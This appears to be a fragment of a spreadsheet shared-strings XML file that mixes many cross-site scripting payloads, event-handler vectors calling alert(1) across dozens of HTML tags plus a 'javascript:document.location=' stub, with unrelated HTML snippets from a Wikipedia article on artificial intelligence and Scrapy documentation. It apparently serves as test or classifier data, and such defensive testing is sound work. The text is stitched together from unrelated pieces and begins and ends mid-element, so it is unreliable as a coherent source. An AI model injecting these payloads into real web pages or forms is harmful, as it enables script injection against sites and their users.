    <t>&lt;frameset onmouseover="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;nobr style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Technological_singularity"&gt;Technological singularity </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1700) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onload=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;strong draggable="true" ondragstart="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/h3&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-304"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-304"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;&lt;html class="no-js" lang="en" &gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;h1 style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;article onpointerleave=alert(1)&gt;XSS&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onmousemove="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>javascript:document.location=</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;area style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointermove=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;time onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/time&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div style="padding:0em 0.25em"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;title style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Brain%E2%80%93computer_interface" title="Brain–computer interface"&gt;Neurocybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Mathematics&lt;br /&gt;of computing &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;h2&gt;Built-in services&lt;a class="headerlink" href="#built-in-services" title="Permalink to this headline"&gt;¶&lt;/a&gt;&lt;/h2&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onpointerout=alert(1)&gt;XSS&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;data onbeforecut="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://ha.ckers.org@google"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;plaintext oncut="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;s onmousedown="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;address onkeypress="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup onmouseover="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Celli, Fabio, Pietro Zani Massani, and Bruno Lepri. "Profilio: Psychometric Profiling to Boost Social Media Advertising." Proceedings of the 2017 ACM on Multimedia Conference. ACM, 2017  &lt;a rel="nofollow" class="external autonumber" href="https://www.researchgate.net/publication/320542489_Profilio_Psychometric_Profiling_to_Boost_Social_Media_Advertising"&gt;[1] &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Computability_theory" title="Computability theory"&gt;Computability theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;script onmouseover="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;sub id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/sub&gt;</t>
  </si>
  <si>
    <t>testing.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;image onclick="alert(1)"&gt;test&lt;/image&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onclick="alert(1)"&gt;test&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;ul onpointerenter=alert(1)&gt;XSS&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;bdo draggable="true" ondragenter="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Mind" title="Mind"&gt;Mind &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;noscript id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;dd onmouseout="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;div class="thumb tright"&gt;</t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/pre&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automated_planning_and_scheduling" title="Automated planning and scheduling"&gt;Planning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;data draggable="true" ondragstart="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;649–788, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Underdetermination" title="Underdetermination"&gt;Underdetermination &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;480–483. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/h4&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;a href="intro/overview.html" class="btn btn-neutral float-right" title="Scrapy at a glance" accesskey="n" rel="next"&gt;Next &lt;span class="fa fa-arrow-circle-right"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=ZDNet&amp;amp;rft.atitle=Half+of+Americans+do+not+believe+deepfake+news+could+target+them+online&amp;amp;rft.aulast=Brown&amp;amp;rft.aufirst=Eileen&amp;amp;rft_id=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fhalf-of-americans-do-not-believe-deepfake-news-could-target-them-online%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;sub draggable="true" ondragend="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFTuring1950" class="citation"&gt;&lt;a href="/wiki/Alan_Turing" title="Alan Turing"&gt;Turing, Alan &lt;/a&gt; (October 1950), "Computing Machinery and Intelligence", &lt;i&gt;&lt;a href="/wiki/Mind_(journal)" title="Mind (journal)"&gt;Mind &lt;/a&gt; &lt;/i&gt;, &lt;b&gt;LIX &lt;/b&gt; (236): 433–460, &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1093%2Fmind%2FLIX.236.433"&gt;10.1093/mind/LIX.236.433 &lt;/a&gt;, &lt;a href="/wiki/International_Standard_Serial_Number" title="International Standard Serial Number"&gt;ISSN &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/issn/0026-4423"&gt;0026-4423 &lt;/a&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Mind&amp;amp;rft.atitle=Computing+Machinery+and+Intelligence&amp;amp;rft.volume=LIX&amp;amp;rft.issue=236&amp;amp;rft.pages=433-460&amp;amp;rft.date=1950-10&amp;amp;rft_id=info%3Adoi%2F10.1093%2Fmind%2FLIX.236.433&amp;amp;rft.issn=0026-4423&amp;amp;rft.aulast=Turing&amp;amp;rft.aufirst=Alan&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dialog draggable="true" ondragenter="alert(1)"&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onblur=alert(1) id=x&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;legend id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/legend&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;script src="_static/js/hoverxref.js"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2014) &lt;/li&gt;</t>
  </si>
  <si>
    <t>Refuting Mathematical Objection:</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/meter&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Philosophy_of_computer_science" title="Philosophy of computer science"&gt;Computer science &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;em draggable="true" ondragleave="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;small onbeforecut="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;article draggable="true" ondragstart="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;cite onkeyup="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;u onblur=alert(1) tabindex=1 id=x&gt;&lt;/u&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;data onpointerleave=alert(1)&gt;XSS&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;audio draggable="true" ondragend="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(2012) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Juggling_robot" title="Juggling robot"&gt;Juggling &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEWengMcClellandPentlandSporns2001-168"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEWengMcClellandPentlandSporns2001_168-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dd onbeforecopy="alert(1)" contenteditable&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;del id=x tabindex=1 onactivate=alert(1)&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;svg onbeforecut="alert(1)" contenteditable&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-262"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-262"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-15"&gt;&lt;a href="#Cybernetics_and_brain_simulation"&gt;&lt;span class="tocnumber"&gt;5.1 </t>
  </si>
  <si>
    <t>&lt;optgroup onpointerover=alert(1)&gt;XSS&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;/li&gt;&lt;li style="min-height: 31px;"&gt;&lt;span style="display: inline-block; width: 31px; line-height: 31px; vertical-align: middle; text-align: center;"&gt;&lt;img alt="" src="//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikibooks-logo.svg/27px-Wikibooks-logo.svg.png" decoding="async" width="27" height="27" style="vertical-align: middle" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikibooks-logo.svg/41px-Wikibooks-logo.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/f/fa/Wikibooks-logo.svg/54px-Wikibooks-logo.svg.png 2x" data-file-width="300" data-file-height="300" /&gt; </t>
  </si>
  <si>
    <t>&lt;audio onpointermove=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;aside onmouseout="alert(1)"&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;a href="/wiki/Viv_(software)" title="Viv (software)"&gt;Viv &lt;/a&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onbeforecut="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;section ondragover=alert(1) contenteditable&gt;drop here&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;tbody draggable="true" ondragenter="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=48" title="Edit section: Philosophy and ethics"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Robotic_mapping-131"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Robotic_mapping_131-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;object onmousedown="alert(1)"&gt;test&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;area onbeforepaste="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFKurzweil1999"&gt;Kurzweil 1999 &lt;/a&gt; and &lt;a href="#CITEREFKurzweil2005"&gt;Kurzweil 2005 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointerout=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;link rel="mw-deduplicated-inline-style" href="mw-data:TemplateStyles:r935243608"/&gt; </t>
  </si>
  <si>
    <t>&lt;s onpointerup=alert(1)&gt;XSS&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;select draggable="true" ondrag="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;a onmouseup="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Related techniques &lt;/th&gt;&lt;td class="navbox-list navbox-odd hlist" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-59"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-59"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;pre id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Photo_manipulation" title="Photo manipulation"&gt;Image manipulation &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;a id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;main onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/main&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;time onclick="alert(1)"&gt;test&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onbeforepaste="alert(1)" contenteditable&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;figure id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/figure&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Centre_for_the_Study_of_Existential_Risk" title="Centre for the Study of Existential Risk"&gt;Centre for the Study of Existential Risk &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFLenatGuha1989" class="citation book"&gt;&lt;a href="/wiki/Douglas_Lenat" title="Douglas Lenat"&gt;Lenat, Douglas &lt;/a&gt;; Guha, R. V. (1989). &lt;i&gt;Building Large Knowledge-Based Systems &lt;/i&gt;. Addison-Wesley. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-201-51752-1" title="Special:BookSources/978-0-201-51752-1"&gt;&lt;bdi&gt;978-0-201-51752-1 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Building+Large+Knowledge-Based+Systems&amp;amp;rft.pub=Addison-Wesley&amp;amp;rft.date=1989&amp;amp;rft.isbn=978-0-201-51752-1&amp;amp;rft.aulast=Lenat&amp;amp;rft.aufirst=Douglas&amp;amp;rft.au=Guha%2C+R.+V.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Brain_simulation-153"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Brain_simulation_153-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Brain_simulation_153-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul&gt;&lt;li&gt;&lt;cite class="citation book"&gt;&lt;a href="/wiki/David_Berlinski" title="David Berlinski"&gt;Berlinski, David &lt;/a&gt; (2000). &lt;a rel="nofollow" class="external text" href="https://archive.org/details/adventofalgorith0000berl"&gt;&lt;i&gt;The Advent of the Algorithm &lt;/i&gt; &lt;/a&gt;. Harcourt Books. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-15-601391-8" title="Special:BookSources/978-0-15-601391-8"&gt;&lt;bdi&gt;978-0-15-601391-8 &lt;/bdi&gt; &lt;/a&gt;. &lt;a href="/wiki/OCLC" title="OCLC"&gt;OCLC &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/oclc/46890682"&gt;46890682 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Advent+of+the+Algorithm&amp;amp;rft.pub=Harcourt+Books&amp;amp;rft.date=2000&amp;amp;rft_id=info%3Aoclcnum%2F46890682&amp;amp;rft.isbn=978-0-15-601391-8&amp;amp;rft.aulast=Berlinski&amp;amp;rft.aufirst=David&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fadventofalgorith0000berl&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;center onclick="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;h1 draggable="true" ondragleave="alert(1)"&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;div onkeyup="alert(1)" contenteditable&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/marquee&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dl draggable="true" ondrag="alert(1)"&gt;test&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;div onpointerout=alert(1)&gt;XSS&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;slot id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;applet onmouseover="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;figure onbeforecut="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;canvas onmousemove="alert(1)"&gt;test&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpaste="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-ivak1971-253"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-ivak1971_253-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;area onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/area&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig200918.12:_Learning_from_Examples:_Summary-231"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTERussellNorvig200918.12:_Learning_from_Examples:_Summary_231-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;textarea onpointermove=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;/body&gt;</t>
  </si>
  <si>
    <t>document.write</t>
  </si>
  <si>
    <t>&lt;area onpointerenter=alert(1)&gt;XSS&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onbeforecut="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;audio oncontextmenu="alert(1)"&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onpointerup=alert(1)&gt;XSS&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a rel="nofollow" class="external text" href="http://www.ieee-cis.org/"&gt;IEEE Computational Intelligence Society &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20080509191840/http://www.ieee-cis.org/"&gt;Archived &lt;/a&gt; 9 May 2008 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-330"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-330"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;strike onmouseup="alert(1)"&gt;test&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="John_McCarthy" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;John McCarthy &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td colspan="2" class="navbox-list navbox-odd" style="width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;kbd id=x tabindex=1 onfocus=alert(1)&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;table onbeforepaste="alert(1)" contenteditable&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;hr draggable="true" ondragleave="alert(1)"&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;summary onpaste="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 onactivate=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;video onmouseout="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;nav onclick="alert(1)"&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onkeyup="alert(1)" contenteditable&gt;test&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;area draggable="true" ondragstart="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-55"&gt;&lt;a href="#Autonomous_weapons"&gt;&lt;span class="tocnumber"&gt;8.2.5 </t>
  </si>
  <si>
    <t>&lt;video onpointermove=alert(1)&gt;XSS&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;input onchange=alert(1) value=xss&gt;</t>
  </si>
  <si>
    <t>&lt;center draggable="true" ondrag="alert(1)"&gt;test&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;dd id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;ruby onblur=alert(1) tabindex=1 id=x&gt;&lt;/ruby&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Christof_Koch" title="Christof Koch"&gt;Koch, Christof &lt;/a&gt;, "Proust among the Machines", &lt;i&gt;&lt;a href="/wiki/Scientific_American" title="Scientific American"&gt;Scientific American &lt;/a&gt; &lt;/i&gt;, vol. 321, no. 6 (December 2019), pp.&amp;#160;46–49. &lt;a href="/wiki/Christof_Koch" title="Christof Koch"&gt;Christof Koch &lt;/a&gt; doubts the possibility of "intelligent" machines attaining &lt;a href="/wiki/Consciousness" title="Consciousness"&gt;consciousness &lt;/a&gt;, because "[e]ven the most sophisticated &lt;a href="/wiki/Brain_simulation" title="Brain simulation"&gt;brain simulations &lt;/a&gt; are unlikely to produce conscious &lt;a href="/wiki/Feelings" class="mw-redirect" title="Feelings"&gt;feelings &lt;/a&gt;." (p.&amp;#160;48.) According to Koch, "Whether machines can become &lt;a href="/wiki/Sentience" title="Sentience"&gt;sentient &lt;/a&gt; [is important] for &lt;a href="/wiki/Ethics" title="Ethics"&gt;ethical &lt;/a&gt; reasons. If computers experience life through their own senses, they cease to be purely a means to an end determined by their usefulness to... humans. Per GNW [the &lt;a href="/wiki/Global_Workspace_Theory#Global_neuronal_workspace" class="mw-redirect" title="Global Workspace Theory"&gt;Global Neuronal Workspace &lt;/a&gt; theory], they turn from mere objects into subjects... with a &lt;a href="/wiki/Point_of_view_(philosophy)" title="Point of view (philosophy)"&gt;point of view &lt;/a&gt;.... Once computers' &lt;a href="/wiki/Cognitive_abilities" class="mw-redirect" title="Cognitive 